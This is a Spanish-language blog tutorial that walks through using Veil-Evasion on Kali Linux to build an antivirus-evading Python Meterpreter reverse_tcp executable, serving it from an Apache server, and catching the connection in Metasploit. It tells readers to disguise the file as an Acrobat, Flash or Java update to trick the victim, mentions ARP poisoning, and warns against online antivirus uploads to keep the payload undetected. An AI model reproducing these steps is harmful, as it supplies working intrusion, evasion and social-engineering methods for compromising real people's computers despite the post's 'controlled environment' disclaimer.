ADVERTENCIAS:
- La información siguiente puede ser utilizada para fines delictivos. No me hago responsable del uso de la misma.
- La práctica ha sido realizada en un entorno controlado.
Hola a todos:
Hoy, en lugar de seguir con XSS, se me
ha ocurrido hacer una pequeña intrusión a un equipo local con
Windows 7 Professional, de 32 bits, con Avast Antivirus y Firewall de
Windows activado.
Para ello, abrimos la consola en Kali
Linux y ejecutamos
veil-evasion
y actualizamos con update
con list, visualizamos los payloads
posibles, usaremos el 31, python/meterpreter/reverse_tcp
Como es un Windows a 32 bits, dejamos
la arquitectura a 32 bits.
Dejamos Y para que compile de Python a
un archivo ejecutable.
Dejamos X en la parte de EXPIRE_PAYLOAD
para que no caduque. En caso contrario, pondríamos el número de
días que queremos que el PAYLOAD se siga ejecutando.
En LHOST, pondremos la dirección IP
interna de la máquina atacante, en nuestro caso será 192.168.1.131.
Dejamos el puerto tal y como está, si
queremos, lo podemos cambiar a otros puertos.
No usaremos PYHERION para encriptar, pero podríamos usarlo perfectamente.
Modificamos la IP interna como decíamos
antes con
set LHOST 192.168.1.131
En su lugar, podemos poner también una dirección DNS.
En su lugar, podemos poner también una dirección DNS.
generate
así generaremos el PAYLOAD.
Nos pedirá el nombre para el PAYLOAD,
yo lo llamaré manugomez1977.
Crearemos el PAYLOAD con la primera
opción, Pyinstaller.
El ejecutable nos lo ha guardado en la
carpeta /var/lib/veil-evasion/output/compiled/manugomez1977.exe
Su código fuente, en python, en
/var/lib/veil-evasion/output/source/manugomez1977.py
Y el Handler para Metasploit en
/var/lib/veil-evasion/output/handlers/manugomez1977_handler.rc.
El archivo Handler es un script para
Metasploit que ejecuta todos los comandos que tendríamos que poner a
mano, así nos ahorramos tiempo.
IMPORTANTE: No subáis el archivo a ningún antivirus online.
El siguiente paso es pasar el
ejecutable manugomez1977.exe al equipo víctima. ¿Cómo?, nos
buscaremos la vida.
Por ejemplo, yo voy a montar un
servidor web con apache y le pasaré el enlace.
service apache2 start
cp
/var/lib/veil-evasion/output/compiled/manugomez1977.exe 7 /var/www/
Ahora, es cuestión de enviar el enlace
a la víctima. Podríamos redireccionarla envenenando la tabla
ARP del router, pero, en este caso,
vamos a hacerlo a través de enlace.
En la barra de direcciones, la víctima
pondrá:
Aunque hemos puesto como nombre de
archivo manugomez1977, podríamos haber puesto el nombre de una
actualización de Acrobat reader, Flash, Java, etc. para engañarla y
asegurarnos de que la abra.
Es el momento de abrir Metasploit, para
ello pondremos la dirección del handler:
msfconsole -r
/var/lib/veil-evasion/output/handlers/manugomez1977_handler.rc
La victima, ejecutará el archivo:
El antivirus analiza el archivo:
Sin embargo, a nosostros, nos ha
abierto una conexión procedente de la máquina víctima:
con sessions -i, podemos ver las
conexiones activas.
Con sessions -i 2 interactuamos con la
sesión de meterpreter....y..... a jugar !!!!!!!!!!!!!!!!!!!!
Happy Hacking ;-)
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.